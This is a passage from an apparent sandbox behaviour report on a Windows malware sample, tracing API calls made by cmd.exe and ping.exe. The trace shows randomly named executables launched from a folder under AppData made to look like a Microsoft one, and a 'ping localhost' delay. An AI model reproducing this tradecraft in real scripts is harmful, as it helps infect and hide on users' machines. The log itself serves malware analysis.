(_String1="\"C", _String2="RENAME") returned -80 [0096.711] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0096.711] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0096.711] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0096.711] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0096.711] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0096.711] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0096.711] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0096.711] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0096.711] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0096.711] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0096.711] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0096.711] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0096.711] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0096.711] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0096.711] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0096.711] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0096.711] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0096.711] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0096.711] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0096.711] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0096.711] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0096.711] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0096.711] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0096.711] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0096.711] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0096.712] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0096.712] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0096.712] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0096.712] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0096.712] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0096.712] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0096.712] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0096.712] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0096.712] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0096.712] SetErrorMode (uMode=0x0) returned 0x0 [0096.712] SetErrorMode (uMode=0x1) returned 0x0 [0096.712] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\.", nBufferLength=0x208, lpBuffer=0x1a0620, lpFilePart=0x18ee7c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1", lpFilePart=0x18ee7c*="MICROS~1") returned 0x29 [0096.712] SetErrorMode (uMode=0x0) returned 0x1 [0096.712] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\.") returned 1 [0096.712] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.715] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.715] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe", fInfoLevelId=0x1, lpFindFileData=0x18ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec18) returned 0x1a20b8 [0096.715] FindClose (in: hFindFile=0x1a20b8 | out: hFindFile=0x1a20b8) returned 1 [0096.716] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0096.716] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0096.716] GetConsoleTitleW (in: lpConsoleTitle=0x18f0f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.716] InitializeProcThreadAttributeList (in: lpAttributeList=0x18ef78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f040 | out: lpAttributeList=0x18ef78, lpSize=0x18f040) returned 1 [0096.716] UpdateProcThreadAttribute (in: lpAttributeList=0x18ef78, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f038, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18ef78, lpPreviousValue=0x0) returned 1 [0096.716] GetStartupInfoW (in: lpStartupInfo=0x18ef34 | out: lpStartupInfo=0x18ef34*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0096.717] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0096.717] lstrcmpW (lpString1="\\LSfkRHur.exe", lpString2="\\XCOPY.EXE") returned -1 [0096.718] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18efd4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f020 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessInformation=0x18f020*(hProcess=0x50, hThread=0x4c, dwProcessId=0xba4, dwThreadId=0xba8)) returned 1 [0097.349] CloseHandle (hObject=0x4c) returned 1 [0097.349] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0097.349] GetEnvironmentStringsW () returned 0x1a2d70* [0097.349] FreeEnvironmentStringsW (penv=0x1a2d70) returned 1 [0097.349] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0100.237] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18ef14 | out: lpExitCode=0x18ef14*=0x0) returned 1 [0100.237] CloseHandle (hObject=0x50) returned 1 [0100.237] _vsnwprintf (in: _Buffer=0x18f05c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ef20 | out: _Buffer="00000000") returned 8 [0100.237] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0100.237] GetEnvironmentStringsW () returned 0x1a24f0* [0100.238] FreeEnvironmentStringsW (penv=0x1a24f0) returned 1 [0100.238] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0100.238] GetEnvironmentStringsW () returned 0x1a24f0* [0100.238] FreeEnvironmentStringsW (penv=0x1a24f0) returned 1 [0100.238] DeleteProcThreadAttributeList (in: lpAttributeList=0x18ef78 | out: lpAttributeList=0x18ef78) [0100.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.238] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.238] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.238] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.238] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.238] SetConsoleInputExeNameW () returned 0x1 [0100.238] GetConsoleOutputCP () returned 0x1b5 [0100.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.238] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.238] exit (_Code=0) Process: id = "13" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea167a0" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xafc" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 899 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 900 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 901 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 902 start_va = 0x1c0000 end_va = 0x1c7fff entry_point = 0x1c0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 903 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 904 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 905 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 906 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 907 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 908 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 910 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 911 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 912 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 913 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 914 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 915 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 916 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 917 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 918 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 919 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 920 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 921 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 922 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 923 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 924 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 925 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 926 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 927 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 928 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 929 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 930 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 931 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 932 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 933 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 934 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 935 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 936 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 937 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 938 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 939 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 940 start_va = 0x11d0000 end_va = 0x149efff entry_point = 0x11d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 941 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 942 start_va = 0x300000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 943 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1008 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1036 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1037 start_va = 0x130000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1078 start_va = 0x15d0000 end_va = 0x160ffff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 1079 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1080 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1091 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1101 start_va = 0x14a0000 end_va = 0x157ffff entry_point = 0x0 region_type = private name = "private_0x00000000014a0000" filename = "" Region: id = 1203 start_va = 0x1710000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 1204 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1291 start_va = 0x1670000 end_va = 0x16affff entry_point = 0x0 region_type = private name = "private_0x0000000001670000" filename = "" Region: id = 1292 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 14 os_tid = 0xb40 [0095.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fc5c | out: lpSystemTimeAsFileTime=0x22fc5c*(dwLowDateTime=0x7767d860, dwHighDateTime=0x1d440a9)) [0095.807] GetCurrentProcessId () returned 0xb3c [0095.807] GetCurrentThreadId () returned 0xb40 [0095.807] GetTickCount () returned 0x22fc6 [0095.807] QueryPerformanceCounter (in: lpPerformanceCount=0x22fc54 | out: lpPerformanceCount=0x22fc54*=15259657363) returned 1 [0095.808] GetModuleHandleA (lpModuleName=0x0) returned 0x1c0000 [0095.808] __set_app_type (_Type=0x1) [0095.808] __p__fmode () returned 0x76b331f4 [0095.808] __p__commode () returned 0x76b331fc [0095.808] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1c2ae1) returned 0x0 [0095.808] __getmainargs (in: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8, _DoWildCard=0, _StartInfo=0x1c50e8 | out: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8) returned 0 [0095.809] SetThreadUILanguage (LangId=0x0) returned 0x409 [0095.809] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0095.809] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x1c5440 | out: lpWSAData=0x1c5440) returned 0 [0095.816] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x22f6ec | out: phkResult=0x22f6ec*=0x58) returned 0x0 [0095.816] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x22f6e0, lpData=0x22f6e8, lpcbData=0x22f6e4*=0x4 | out: lpType=0x22f6e0*=0x0, lpData=0x22f6e8*=0x0, lpcbData=0x22f6e4*=0x4) returned 0x2 [0095.816] RegCloseKey (hKey=0x58) returned 0x0 [0095.816] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f6b4*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f6dc | out: ppResult=0x22f6dc*=0x0) returned 11001 [0095.816] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f6b4*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f6dc | out: ppResult=0x22f6dc*=0x3e46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x3e47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3e47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3e3a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0096.764] FreeAddrInfoW (pAddrInfo=0x3e46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x3e47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3e47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3e3a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0096.764] Icmp6CreateFile () returned 0x3e8b40 [0097.340] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x3e4830 [0097.340] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x3eebb0 [0097.341] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fbdc, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0097.341] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x22f6dc, nSize=0x0, Arguments=0x22f6d8 | out: lpBuffer="XH>") returned 0x19 [0097.341] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x3e4858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0097.341] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0097.341] _write (in: _FileHandle=1, _Buf=0x3e4858*, _MaxCharCount=0x19 | out: _Buf=0x3e4858*) returned 25 [0097.350] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0097.350] LocalFree (hMem=0x3e4858) returned 0x0 [0097.350] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x22f6e0, nSize=0x0, Arguments=0x22f6dc | out: lpBuffer="XH>") returned 0x18 [0097.350] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x3e4858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0097.350] 